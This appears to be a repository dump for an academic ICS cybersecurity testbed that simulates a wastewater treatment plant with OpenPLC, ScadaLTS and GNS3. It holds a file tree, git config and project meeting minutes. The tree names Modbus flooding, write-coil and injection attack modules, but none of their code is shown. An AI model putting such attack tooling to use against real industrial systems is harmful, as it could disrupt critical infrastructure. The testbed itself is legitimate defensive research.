├── .gitignore ├── .gitmodules ├── Minutes ├── 2023-03-24.md ├── 2023-03-29.md ├── 2023-04-05.md ├── 2023-04-19.md ├── 2023-04-26.md ├── 2023-05-03.md ├── 2023-05-10.md ├── 2023-05-17.md ├── 2023-05-24.md ├── 2023-05-31.md ├── 2023-06-08.md ├── 2023-06-14.md └── 2023-06-21.md ├── README.md ├── attacker ├── modtester │ ├── Application │ │ └── modules │ │ │ └── modbus │ │ │ ├── dos │ │ │ ├── floodingAttack.py │ │ │ ├── writeSingleCoils.py │ │ │ ├── writeSingleCoilsID.py │ │ │ ├── writeSingleRegister.py │ │ │ └── writeSingleRegisterID.py │ │ │ └── scanner │ │ │ ├── coilDiscover.py │ │ │ ├── discover.py │ │ │ ├── discreteInputDiscover.py │ │ │ ├── getfunc.py │ │ │ ├── holdingRegisterDiscover.py │ │ │ ├── inputRegisterDiscover.py │ │ │ ├── portDiscover.py │ │ │ └── uid.py │ ├── Dockerfile │ ├── Output │ │ ├── Brute Force UID_192.168.127.82.txt │ │ ├── Brute Force UID_214.67.123.45.txt │ │ ├── Get Function_192.168.127.82.txt │ │ ├── Modbus Coil Discover_192.168.127.82.txt │ │ ├── Modbus Discover_192.168.127.82.txt │ │ ├── Modbus Holding Register Discover_192.168.127.82.txt │ │ ├── Modbus Input Register Discover_192.168.127.82.txt │ │ ├── Write Single Coil_192.168.127.82.txt │ │ ├── Write Single Register_192.168.127.82.txt │ │ └── output │ ├── README.md │ ├── System │ │ ├── Core │ │ │ ├── Banner.py │ │ │ ├── Colors.py │ │ │ ├── Global.py │ │ │ ├── Interface.py │ │ │ ├── Loader.py │ │ │ ├── Modbus.py │ │ │ └── __init__.py │ │ ├── Lib │ │ │ ├── __init__.py │ │ │ ├── ipcalc.py │ │ │ ├── pexpect.py │ │ │ ├── prettytable.py │ │ │ └── scapy │ │ │ │ ├── __init__.py │ │ │ │ ├── all.py │ │ │ │ ├── ansmachine.py │ │ │ │ ├── arch │ │ │ │ ├── __init__.py │ │ │ │ ├── bsd.py │ │ │ │ ├── linux.py │ │ │ │ ├── pcapdnet.py │ │ │ │ ├── solaris.py │ │ │ │ ├── unix.py │ │ │ │ └── windows │ │ │ │ │ └── __init__.py │ │ │ │ ├── as_resolvers.py │ │ │ │ ├── asn1 │ │ │ │ ├── __init__.py │ │ │ │ ├── asn1.py │ │ │ │ ├── ber.py │ │ │ │ └── mib.py │ │ │ │ ├── asn1fields.py │ │ │ │ ├── asn1packet.py │ │ │ │ ├── automaton.py │ │ │ │ ├── autorun.py │ │ │ │ ├── base_classes.py │ │ │ │ ├── config.py │ │ │ │ ├── contrib │ │ │ │ ├── __init__.py │ │ │ │ ├── avs.py │ │ │ │ ├── bgp.py │ │ │ │ ├── carp.py │ │ │ │ ├── cdp.py │ │ │ │ ├── chdlc.py │ │ │ │ ├── dtp.py │ │ │ │ ├── eigrp.py │ │ │ │ ├── etherip.py │ │ │ │ ├── gsm_um.py │ │ │ │ ├── igmp.py │ │ │ │ ├── igmpv3.py │ │ │ │ ├── ikev2.py │ │ │ │ ├── ldp.py │ │ │ │ ├── mpls.py │ │ │ │ ├── ospf.py │ │ │ │ ├── ppi.py │ │ │ │ ├── ppi_cace.py │ │ │ │ ├── ppi_geotag.py │ │ │ │ ├── ripng.py │ │ │ │ ├── rsvp.py │ │ │ │ ├── skinny.py │ │ │ │ ├── ubberlogger.py │ │ │ │ ├── vqp.py │ │ │ │ ├── vtp.py │ │ │ │ └── wpa_eapol.py │ │ │ │ ├── crypto │ │ │ │ ├── __init__.py │ │ │ │ └── cert.py │ │ │ │ ├── dadict.py │ │ │ │ ├── data.py │ │ │ │ ├── error.py │ │ │ │ ├── fields.py │ │ │ │ ├── layers │ │ │ │ ├── __init__.py │ │ │ │ ├── all.py │ │ │ │ ├── bluetooth.py │ │ │ │ ├── dhcp.py │ │ │ │ ├── dhcp6.py │ │ │ │ ├── dns.py │ │ │ │ ├── dot11.py │ │ │ │ ├── gprs.py │ │ │ │ ├── hsrp.py │ │ │ │ ├── inet.py │ │ │ │ ├── inet6.py │ │ │ │ ├── ipsec.py │ │ │ │ ├── ir.py │ │ │ │ ├── isakmp.py │ │ │ │ ├── l2.py │ │ │ │ ├── l2tp.py │ │ │ │ ├── llmnr.py │ │ │ │ ├── mgcp.py │ │ │ │ ├── mobileip.py │ │ │ │ ├── netbios.py │ │ │ │ ├── netflow.py │ │ │ │ ├── ntp.py │ │ │ │ ├── pflog.py │ │ │ │ ├── ppp.py │ │ │ │ ├── radius.py │ │ │ │ ├── rip.py │ │ │ │ ├── rtp.py │ │ │ │ ├── sctp.py │ │ │ │ ├── sebek.py │ │ │ │ ├── skinny.py │ │ │ │ ├── smb.py │ │ │ │ ├── snmp.py │ │ │ │ ├── tftp.py │ │ │ │ ├── vrrp.py │ │ │ │ └── x509.py │ │ │ │ ├── main.py │ │ │ │ ├── modules │ │ │ │ ├── __init__.py │ │ │ │ ├── geoip.py │ │ │ │ ├── nmap.py │ │ │ │ ├── p0f.py │ │ │ │ ├── queso.py │ │ │ │ └── voip.py │ │ │ │ ├── packet.py │ │ │ │ ├── pipetool.py │ │ │ │ ├── plist.py │ │ │ │ ├── pton_ntop.py │ │ │ │ ├── route.py │ │ │ │ ├── route6.py │ │ │ │ ├── scapypipes.py │ │ │ │ ├── sendrecv.py │ │ │ │ ├── supersocket.py │ │ │ │ ├── themes.py │ │ │ │ ├── tools │ │ │ │ ├── UTscapy.py │ │ │ │ ├── __init__.py │ │ │ │ └── check_asdis.py │ │ │ │ ├── utils.py │ │ │ │ ├── utils6.py │ │ │ │ └── volatile.py │ │ └── __init__.py │ ├── documentacion ModTester.pdf │ └── modTester.py └── single_attacker │ ├── Dockerfile │ ├── injection_attack │ └── injection_attack.cpp ├── documentation ├── Components │ ├── Attacker.md │ ├── Matlab.md │ ├── Network.md │ ├── OpenPLC.md │ ├── Scada-LTS-GNS3.md │ └── Scada-LTS.md ├── Diagrams │ ├── ModTester.png │ ├── ModTester.uml │ ├── ModTester_automation.png │ └── ModTester_automation.uml ├── Requirements │ ├── basic-requirements.md │ └── gns3.md ├── StateOfArt │ ├── Papers │ │ ├── 1-s2.0-S1474667017485326-main.pdf │ │ ├── 2210.13325.pdf │ │ ├── Dragos_ChernoviteWP_v2b.pdf │ │ ├── IEEE_An_Open-Source_Testbed_to_Visualise_ICS_Cybersecurity_Weaknesses_and_Remediation_Strategies__A_Research_Agenda_Proposal.pdf │ │ ├── Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf │ │ ├── Stuxnet_Dissecting_a_Cyberwarfare_Weapon.pdf │ │ └── applsci-12-07942.pdf │ └── Project Documentation │ │ ├── Testbed_WWTP │ │ ├── Testbed_basado_en_WWTP_sobre_GNS3_para_desarrollo_de_pruebas_de_seguridad.pdf │ │ ├── main.tex │ │ └── wwtp.bib │ │ └── WWTP_PLC_Interfaz │ │ ├── WWTP_PLC_Interface.pdf │ │ └── main.tex ├── UseCases │ ├── WWTP.md │ └── WaterHeater.md └── YouSnoozeYouLose.pdf ├── network ├── DockerDeployment │ ├── ICSNetwork │ │ ├── Makefile │ │ ├── database │ │ │ └── db.env │ │ ├── docker-compose.yml │ │ └── scripts │ │ │ ├── destroy-icsnetwork.sh │ │ │ ├── start-icsnetwork.sh │ │ │ └── stop-icsnetwork.sh │ ├── attacker │ │ ├── .env.example │ │ ├── Makefile │ │ ├── docker-compose.yml │ │ └── scripts │ │ │ ├── destroy-attacker.sh │ │ │ ├── start-attacker.sh │ │ │ └── stop-attacker.sh │ ├── modtester │ │ ├── Makefile │ │ ├── docker-compose.yml │ │ └── scripts │ │ │ ├── destroy-modtester.sh │ │ │ ├── start-modtester.sh │ │ │ └── stop-modtester.sh │ └── tcpdump │ │ ├── Makefile │ │ ├── docker-compose.yml │ │ └── scripts │ │ ├── destroy-tcpdump.sh │ │ ├── start-tcpdump.sh │ │ └── stop-tcpdump.sh └── GNS3Deployment │ ├── ICSVirtual.gns3project │ ├── ICSVirtual_old.gns3project │ └── demo.gns3project ├── openplc ├── process_sample │ └── water_heater.st ├── process_sample2 │ └── watertreatment.st ├── simulink_interface.st └── watertreatment.st ├── scada-lts ├── Water Treatment.json ├── background.png ├── dockerfile ├── process_sample │ ├── Water Heater 3 Stations.json │ └── background.png ├── process_sample2 │ └── Water Treatment.json └── scripts │ └── scripts-one-insert.txt └── wwtp ├── Dockerfile ├── interface_simLink ├── interface.cfg ├── simlink.cpp └── test │ ├── interface.cfg │ ├── simlink.cpp │ ├── test.st │ └── test_2022a.slx └── simulink ├── .1742-6906-50e9-c555.tmp ├── .3ac2-26b6-5db3-e22c.tmp ├── .6f47-f7a4-8c25-8e1e.tmp ├── .76f6-2c94-ffa5-2e44.tmp ├── .bbc9-d772-2b62-69d8.tmp ├── Remedy_WWTP.slx ├── Remedy_WWTP.slxc ├── Remedy_WWTP_all.slx ├── Remedy_WWTP_old.slx ├── implementacion_r2016a.slx ├── implementacion_r2022a.slx ├── implementacion_r2022a.slx.bak ├── implementacion_simplified_2022a.slx ├── iniASM1model.m ├── iniASU_UNIT.m ├── iniSETTLING_POINT.m ├── mex-functions ├── ASU Unit │ ├── ASU_UNIT.c │ ├── ASU_UNIT.h │ └── ASU_UNIT.mexa64 ├── ModN1.h ├── Settling Point │ ├── SETTLING_POINT.c │ ├── SETTLING_POINT.h │ └── SETTLING_POINT.mexa64 ├── Three Combiner │ ├── THREE_COMBINER.asv │ ├── THREE_COMBINER.c │ ├── THREE_COMBINER.h │ └── THREE_COMBINER.mexa64 ├── Two Absolute Splitter │ ├── TWO_ABS_SPLITTER.c │ ├── TWO_ABS_SPLITTER.h │ └── TWO_ABS_SPLITTER.mexa64 ├── Two Combiner │ ├── TWO_COMBINER.c │ ├── TWO_COMBINER.h │ └── TWO_COMBINER.mexa64 └── Two Relative Splitter │ ├── TWO_REL_SPLITTER.c │ ├── TWO_REL_SPLITTER.h │ └── TWO_REL_SPLITTER.mexa64 ├── modbus-connector ├── modbusMatLib.slx ├── modbus_read.m ├── modbus_write.m ├── updateBlockParameter.m └── write_to_workspace.mat ├── slprj └── sim │ └── varcache │ └── implementacion_r2022a │ ├── checksumOfCache.mat │ ├── tmwinternal │ └── simulink_cache.xml │ └── varInfo.mat └── test.slx /.gitignore: -------------------------------------------------------------------------------- 1 | .env 2 | tcpdump/*.pcap 3 | databases/ 4 | attacker/injection_attack 5 | *.pyc -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "network/ModTester"] 2 | path = network/ModTester 3 | url = https://github.com/Dangoro94/ModTester.git 4 | [submodule "ModTester"] 5 | path = ModTester 6 | url = https://github.com/sfl0r3nz05/ModTester.git 7 | -------------------------------------------------------------------------------- /Minutes/2023-03-24.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 24/03/2023 2 | 3 | ## Minutes 4 | - This minute is created by [Ander Gómez](https://github.com/gomezander). 5 | 6 | ## Closed issues and decisions 7 | - [Ander Gómez](https://github.com/gomezander) understood project and components(OplenPLC, ScadaLTS, GNS3, Attacker) basic knowledge. 8 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) provided [Ander Gómez](https://github.com/gomezander) WWTP and PIPEDREAM information needed for project developement. 9 | - [Mikel Dean](mdeano@ceit.es) clarified [Ander Gómez](https://github.com/gomezander) some work Schedule doubts. 10 | 11 | ## Open issues and questions 12 | 13 | - [Ander Gómez](https://github.com/gomezander) will deploy ScadaLTS docker image that includes MySQL server. 14 | - [Ander Gómez](https://github.com/gomezander) will read section A of WWTP paper provided by [Santiago Figueroa](https://github.com/sfl0r3nz05). 15 | - [Ander Gómez](https://github.com/gomezander) will include [ModTester](https://github.com/sfl0r3nz05/ModTester) as a submodule in the project repository. 16 | - [Ander Gómez](https://github.com/gomezander) will read PIPEDREAM document provided by [Santiago Figueroa](https://github.com/sfl0r3nz05) 17 | - [Ander Gómez](https://github.com/gomezander) will include Simulink docker image information in Tools/Technologies table. 18 | - [Ander Gómez](https://github.com/gomezander) will continue to read project documentation and develop State of the Art document. 19 | - [Ander Gómez](https://github.com/gomezander) will merge experimental branch into main branch. 20 | - [Ander Gómez](https://github.com/gomezander) will verify if the Open Builder project supports an export format to be flashed to a reaL Omrom/Siemens PLC. 21 | 22 | ## Discussion and proposals 23 | - Implementing WWTP over Matlab runtime. 24 | - WWTP use cases. 25 | - OpenPLC module exportation to physical OMROM PLC. 26 | 27 | ## Special notes 28 | -------------------------------------------------------------------------------- /Minutes/2023-03-29.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 29/03/2023 2 | 3 | ## Minutes 4 | - This minute is created by [Ander Gómez](https://github.com/gomezander). 5 | 6 | ## Closed issues and decisions 7 | - [Ander Gómez](https://github.com/gomezander) read Section A of WWTP paper and PIPEDREAM whitepaper provided by [Santiago Figueroa](https://github.com/sfl0r3nz05) 8 | - [Ander Gómez](https://github.com/gomezander) included [ModTester](https://github.com/sfl0r3nz05/ModTester) as a submodule in the project repo. 9 | - [Ander Gómez](https://github.com/gomezander) included Simulink docker image information in Tools/Technologies table. 10 | 11 | ## Open issues and questions 12 | 13 | - [Ander Gómez](https://github.com/gomezander) will continue writing State of the Art document. 14 | - [Ander Gómez](https://github.com/gomezander) will deploy the project demo in GNS3. 15 | - [Ander Gómez](https://github.com/gomezander) will merge experimental branch into main branch of the project. 16 | - [Ander Gómez](https://github.com/gomezander) will verify if the [OpenPLC Editor](https://openplcproject.com/docs/3-1-openplc-editor-overview/) project supports an export format to be flashed to a physical Omrom/Siemens PLC. 17 | 18 | ## Discussion and proposals 19 | - GNS3 server configuration and container importation. 20 | - OpenPLC module exportation to physical OMROM PLC. 21 | - Future project lines. 22 | 23 | ## Special notes 24 | - Project demo is based on [DEF CON 26 talk "Hacking PLCs and Causing Havoc on Critical Infrastructures"](https://github.com/thiagoralves/defcon26) project. 25 | -------------------------------------------------------------------------------- /Minutes/2023-04-05.md: -------------------------------------------------------------------------------- 1 | 2 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 05/04/2023 3 | 4 | ## Minutes 5 | - This minute is created by [Ander Gómez](https://github.com/gomezander). 6 | 7 | ## Closed issues and decisions 8 | - [Ander Gómez](https://github.com/gomezander) deployed project demo in GNS3. 9 | - [Ander Gómez](https://github.com/gomezander) merged experimental branch into main. 10 | ## Open issues and questions 11 | 12 | - [Ander Gómez](https://github.com/gomezander) will finish writing State of the Art document. 13 | - [Ander Gómez](https://github.com/gomezander) will record a video of the project demo with the attacker. 14 | - [Ander Gómez](https://github.com/gomezander) will design ModTester flux diagrams. 15 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) will provide [Ander Gómez](https://github.com/gomezander) WWTP variables info. 16 | - [Ander Gómez](https://github.com/gomezander) will study WWTP variable nature and ModBus variable management to design a PLC-WWTP interface. 17 | - [Ander Gómez](https://github.com/gomezander) will verify if the [OpenPLC Editor](https://openplcproject.com/docs/3-1-openplc-editor-overview/) project supports an export format to be flashed to a physical Omrom/Siemens PLC. 18 | 19 | ## Discussion and proposals 20 | - WWTP interface with PLC and ScadaLTS. 21 | - WWTP microservice implementation vs Simulink graphical interface. 22 | - Future project lines. 23 | - Long-term purpose of the project. 24 | 25 | ## Special notes 26 | - Next week's meeting is cancelled due to vacations. Next meeting will be April 19th. 27 | -------------------------------------------------------------------------------- /Minutes/2023-04-19.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 19/04/2023 4 | 5 | ## Minutes 6 | - This minute is created by [Ander Gómez](https://github.com/gomezander). 7 | 8 | ## Closed issues and decisions 9 | - [Ander Gómez](https://github.com/gomezander) finished writing State of the Art document. 10 | - [Ander Gómez](https://github.com/gomezander) recorded a video of the project demo with the attacker. 11 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) provided [Ander Gómez](https://github.com/gomezander) WWTP variables info. 12 | - [Ander Gómez](https://github.com/gomezander) designed ModTester flux diagrams. 13 | - [Ander Gómez](https://github.com/gomezander) started studying WWTP variable nature and ModBus variable management to design a PLC-WWTP interface. 14 | ## Open issues and questions 15 | - [Ander Gómez](https://github.com/gomezander) will write ModBus WWTP-PLC interface design document. 16 | - [Ander Gómez](https://github.com/gomezander) will correct Interface.mainloop() diagram error and include automation script in ModTester flux diagrams. 17 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) will read State of The Arte document and give [Ander Gómez](https://github.com/gomezander) feedback. 18 | - [Ander Gómez](https://github.com/gomezander) will study ScadaLTS-OpenPLC interaction to design ScadaLTS-PLC interface and design an interface for ScadaLTS control panel. 19 | - [Ander Gómez](https://github.com/gomezander) will verify if the [OpenPLC Editor](https://openplcproject.com/docs/3-1-openplc-editor-overview/) project supports an export format to be flashed to a physical Omrom/Siemens PLC. 20 | 21 | ## Discussion and proposals 22 | - WWTP interface with PLC and ScadaLTS. 23 | - ModTester workflow and design. 24 | - Future project lines. 25 | - Long-term purpose of the project. 26 | 27 | ## Special notes 28 | -------------------------------------------------------------------------------- /Minutes/2023-04-26.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 26/04/2023 2 | 3 | ## Minutes 4 | - Minute created by [Ander Gómez](https://github.com/gomezander). 5 | 6 | ## Closed issues and decisions 7 | - [Ander Gómez](https://github.com/gomezander) wrote Modbus WWTP-PLC interface design document. 8 | - [Ander Gómez](https://github.com/gomezander) proposed [thiagoralves/OpenPLC_Simulink-Interface](https://github.com/thiagoralves/OpenPLC_Simulink-Interface) as the WWTP-OpenPLC interface. 9 | - [Ander Gómez](https://github.com/gomezander) corrected Interface.mainloop() diagram error. 10 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) read State of The Art document and gave [Ander Gómez](https://github.com/gomezander) feedback. 11 | - [Ander Gómez](https://github.com/gomezander) started studying ScadaLTS-OpenPLC interaction to design ScadaLTS-PLC interface. 12 | 13 | ## Open issues and questions 14 | - [Ander Gómez](https://github.com/gomezander) will implement ModBus WWTP-PLC interface based on [thiagoralves/OpenPLC_Simulink-Interface](https://github.com/thiagoralves/OpenPLC_Simulink-Interface). 15 | - [Ander Gómez](https://github.com/gomezander) will include automation script in ModTester flux diagrams. 16 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) will give [Ander Gómez](https://github.com/gomezander) feedback about the ModTester diagram. 17 | - [Ander Gómez](https://github.com/gomezander) will design ScadaLTS-PLC interface and design an interface for ScadaLTS control panel. 18 | - [Ander Gómez](https://github.com/gomezander) will study the possibility of implementing WWTP over Matlab runtime. 19 | - [Ander Gómez](https://github.com/gomezander) will verify if the [OpenPLC Editor](https://openplcproject.com/docs/3-1-openplc-editor-overview/) project supports an export format to be flashed to a physical Omrom/Siemens PLC. 20 | 21 | ## Discussion and proposals 22 | - WWTP interface with PLC and ScadaLTS. 23 | - State of the Art document feedback. 24 | - Future project lines. 25 | - Long-term purpose of the project. 26 | 27 | ## Special notes 28 | -------------------------------------------------------------------------------- /Minutes/2023-05-03.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 03/05/2023 2 | 3 | ## Minutes 4 | - Minute created by [Ander Gómez](https://github.com/gomezander). 5 | 6 | ## Closed issues and decisions 7 | - [Ander Gómez](https://github.com/gomezander) implemented ModBus WWTP-PLC interface based on [thiagoralves/OpenPLC_Simulink-Interface](https://github.com/thiagoralves/OpenPLC_Simulink-Interface) locally. [Video Demonstration](https://youtu.be/0kVg-kbwbDM) 8 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) gave [Ander Gómez](https://github.com/gomezander) feedback about the ModTester diagram 9 | - [Ander Gómez](https://github.com/gomezander) mentioned problems faced when trying to access memory registers(%MD) from WWTP-PLC interface and the team disussed possible solutions and workarounds 10 | - [Ander Gómez](https://github.com/gomezander) proposed future ToDo list based on priority and the team discussed it 11 | 12 | ## Open issues and questions 13 | - [Ander Gómez](https://github.com/gomezander) will try to implement a workaround to access memory registers(%MD) from WWTP-PLC interface 14 | - [Ander Gómez](https://github.com/gomezander) will include Simulink model in Docker Matlab container 15 | - [Ander Gómez](https://github.com/gomezander) will implement ScadaLTS-PLC interface 16 | - [Ander Gómez](https://github.com/gomezander) will fix modTester.py diagram based on received feedback 17 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) will give [Ander Gómez](https://github.com/gomezander) feedback about the automation.py diagram 18 | - [Ander Gómez](https://github.com/gomezander) will study the possibility of implementing WWTP over Matlab runtime 19 | - [Ander Gómez](https://github.com/gomezander) will verify if the [OpenPLC Editor](https://openplcproject.com/docs/3-1-openplc-editor-overview/) project supports an export format to be flashed to a physical Omron/Siemens PLC 20 | 21 | 22 | ## Discussion and proposals 23 | - Project resume and contextualization for new team member [Joel Juaristi](jjuaristisa@tecnun.es) 24 | - OpenPLC-Simulink interface float value representation workaround 25 | - ScadaLTS graphical view 26 | - Future project lines 27 | - Long-term purpose of the project 28 | - Related projects 29 | 30 | ## Special notes 31 | New team member [Joel Juaristi](jjuaristisa@tecnun.es). Welcome! 32 | -------------------------------------------------------------------------------- /Minutes/2023-05-10.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 10/05/2023 2 | 3 | ## Minutes 4 | - Minute created by [Ander Gómez](https://github.com/gomezander). 5 | 6 | ## Closed issues and decisions 7 | - [Ander Gómez](https://github.com/gomezander) implemented a workaround to access memory registers(%MD) from WWTP-PLC interface 8 | - [Ander Gómez](https://github.com/gomezander) included Simulink model in Docker Matlab container 9 | - [Ander Gómez](https://github.com/gomezander) found out that OpenPLC Editor does not have export compatibility to Omron/Siemens PLC. The team decided to port manually the OpenPLC program to the physical PLC in the future if time permits 10 | - [Ander Gómez](https://github.com/gomezander) explained problems faced when trying to compile WWTP-PLC interface. The team proposed to compile the interface in Windows and include it in a container so as to be able to run it on Linux later 11 | - The team decided to focus on having a simple but functional version of the project an then upgrade it gradually 12 | 13 | ## Open issues and questions 14 | - [Ander Gómez](https://github.com/gomezander) will implement ScadaLTS-PLC interface 15 | - [Ander Gómez](https://github.com/gomezander) will fix modTester.py diagram based on received feedback 16 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) will give [Ander Gómez](https://github.com/gomezander) feedback about the automation.py diagram 17 | - [Ander Gómez](https://github.com/gomezander) will study the possibility of implementing WWTP over Matlab runtime 18 | - Add Docker component “Package MATLAB Standalone Applications into Docker Images” for WWTP 19 | - Add Docker component “Package MATLAB Standalone Applications into Docker Images” for the OpenPL-WWTP interface 20 | 21 | 22 | ## Discussion and proposals 23 | - WWTP-PLC interface troubleshooting and possible solutions 24 | - Possible solutions to implement WWTP Simulink model over Matlab runtime. [Examples](https://github.com/sfl0r3nz05/DepSimModStandAppDocker) 25 | - Matlab application compilation in Docker 26 | - Possible optimization when loading variables 27 | - Research how to include simulation time as argument 28 | - Research docker system architecture(Application/Simulink model/Submodules, API, etc.) 29 | - Long-term purpose of the project 30 | - Project Schedule 31 | - Best & worst case scenario 32 | - Cybersecurity part 33 | 34 | ## Special notes 35 | 36 | ### ToDo List 37 | 38 | - [ ] Fix WWTP-OpenPLC interface deployment problem 39 | - [ ] Create WWTP-OpenPLC interface on Windows and deploy it on Linux 40 | - [ ] Deploy whole project on Docker 41 | - [ ] Deploy whole project on GNS3 42 | - [ ] Implement Simulink model over Matlab runtime 43 | - [ ] Implement ModTester automatization 44 | - [ ] Pick up Physiscal PLC in Ibaeta 45 | - [ ] Get a mobile rack to anchor the physical PLC 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /Minutes/2023-05-17.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 17/05/2023 2 | 3 | ## Minutes 4 | - Minute created by [Ander Gómez](https://github.com/gomezander). 5 | 6 | ## Closed issues and decisions 7 | - [Ander Gómez](https://github.com/gomezander) deployed simplified version of the whole project on Docker successfully 8 | - Containerization of interface compiler using [gcc Official Docker image](https://hub.docker.com/_/gcc) 9 | - Implementation of ScadaLTS-OpenPLC interface + Graphical View 10 | - Communication between containers 11 | 12 | ## Open issues and questions 13 | - Proposals of possible solutions and workarounds to the [OpenPLC-WWTP interface problem](https://github.com/sfl0r3nz05/ICSsVirtualForCiberSec/issues/29) 14 | - Possible workaround: deploy various interfaces 15 | - Socket communication between OpenPLC and interface 16 | - [Ander Gómez](https://github.com/gomezander) will deploy the project on GNS3 17 | - [Ander Gómez](https://github.com/gomezander) will complete ModTester automatization feature 18 | - [Ander Gómez](https://github.com/gomezander) will fix modTester.py diagram based on received feedback 19 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) will give [Ander Gómez](https://github.com/gomezander) feedback about the automation.py diagram 20 | - Implementation of WWTP over Matlab runtime postponed for the moment 21 | - Add Docker component “Package MATLAB Standalone Applications into Docker Images” for WWTP 22 | - Add Docker component “Package MATLAB Standalone Applications into Docker Images” for the OpenPL-WWTP interface 23 | 24 | 25 | ## Discussion and proposals 26 | - WWTP-PLC interface troubleshooting and possible solutions 27 | - Ask in OpenPLC forum for possible solutions to [OpenPLC-WWTP interface problem](https://github.com/sfl0r3nz05/ICSsVirtualForCiberSec/issues/29) 28 | - Decision to focus on having a simple but functional version of the project instead of implmenting WWTP over Matlab runtime 29 | - Runtime implementation would most probably delay the project 30 | - Making the project work is top priority at the moment 31 | - Physiscal PLC information meeting 32 | - Physical project implementation is left as a future project due to time restrictions 33 | - Project Schedule 34 | - Next steps: Attack behaviour measurements 35 | - Research publications about measures and measurement methods 36 | 37 | ## Special notes 38 | 39 | ### ToDo List 40 | 41 | - [ ] Fix WWTP-OpenPLC interface deployment problem 42 | - [ ] Ask in OpenPLC Forum 43 | - [ ] Deploy whole project on GNS3 44 | - [ ] Video demonstration 45 | - [ ] Implement ModTester automatization 46 | - [ ] Research for attack behaviour measurements and measurement methods 47 | 48 | 49 | -------------------------------------------------------------------------------- /Minutes/2023-05-24.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 24/05/2023 2 | 3 | ## Minutes 4 | - Minute created by [Ander Gómez](https://github.com/gomezander). 5 | 6 | ## Closed issues and decisions 7 | - [Ander Gómez](https://github.com/gomezander) deployed simplified version of the project on GNS3 successfully 8 | 9 | 10 | ## Open issues and questions 11 | - Proposals of possible solutions and workarounds to the [OpenPLC-WWTP interface problem](https://github.com/sfl0r3nz05/ICSsVirtualForCiberSec/issues/29) 12 | - OpenPLC Forum 13 | - GNS3 deployment of the whole project 14 | - AWS VM might not be enough to bear project 15 | - [Ander Gómez](https://github.com/gomezander) will complete ModTester automatization feature 16 | - [Ander Gómez](https://github.com/gomezander) will fix modTester.py diagram based on received feedback 17 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) will give [Ander Gómez](https://github.com/gomezander) feedback about the automation.py diagram 18 | - [Ander Gómez](https://github.com/gomezander) started research about attack behaviour methods and measurements 19 | 20 | 21 | ## Discussion and proposals 22 | - WWTP-PLC interface problem 23 | - Try to fix the problem with community feedback 24 | - GNS3 deployment of whole project 25 | - Check if AWS VM bears whole prject deployment ASAP 26 | - Attack behaviour measurement and methods 27 | - Network-based methods are most suitable in our case 28 | 29 | ## Special notes 30 | 31 | ### ToDo List 32 | 33 | - [ ] Fix WWTP-OpenPLC interface deployment problem 34 | - [ ] OpenPLC Forum feedback 35 | - [ ] Deploy whole project on GNS3 36 | - [ ] Test if VM supports it 37 | - [ ] Video demonstration 38 | - [ ] Implement ModTester automatization 39 | - [ ] Research for attack behaviour measurements and measurement methods 40 | - [ ] Network based methods: pfsense, firewall, etc. 41 | - [ ] Repo documentaiton 42 | 43 | -------------------------------------------------------------------------------- /Minutes/2023-05-31.md: -------------------------------------------------------------------------------- 1 | # ICSs virtualized lab testbed for cybersecurity testing - Meeting Notes for 31/05/2023 2 | 3 | ## Minutes 4 | 5 | - Minute created by [Ander Gómez](https://github.com/gomezander). 6 | 7 | ## Closed issues and decisions 8 | 9 | - [Ander Gómez](https://github.com/gomezander) deployed simplified version of the project on GNS3 successfully 10 | 11 | ## Open issues and questions 12 | 13 | - Proposals of possible solutions and workarounds to the [OpenPLC-WWTP interface problem](https://github.com/sfl0r3nz05/ICSsVirtualForCiberSec/issues/29) 14 | - OpenPLC Forum 15 | - GNS3 deployment of the whole project 16 | - AWS VM might not be enough to bear project with attacker 17 | - [Ander Gómez](https://github.com/gomezander) will complete ModTester automatization feature 18 | - [Ander Gómez](https://github.com/gomezander) will fix modTester.py diagram based on received feedback 19 | - [Santiago Figueroa](https://github.com/sfl0r3nz05) and [Mikel Dean](mdeanoses@ceit.es) will give [Ander Gómez](https://github.com/gomezander) feedback about the automation.py diagram 20 | - [Ander Gómez](https://github.com/gomezander) continued research about attack behaviour methods and measurements 21 | 22 | ## Discussion and proposals 23 | 24 | - WWTP-PLC interface problem 25 | - Try to fix the problem with community feedback 26 | - GNS3 deployment of whole project 27 | - Check if AWS VM bears whole prject deployment with the attacker 28 | - Attack behaviour measurement and methods 29 | - Network-based methods are most suitable in our case 30 | 31 | ## Special notes 32 | 33 | ### ToDo List 34 | 35 | - [ ] Fix WWTP-OpenPLC interface deployment problem 36 | - [ ] OpenPLC Forum feedback 37 | - 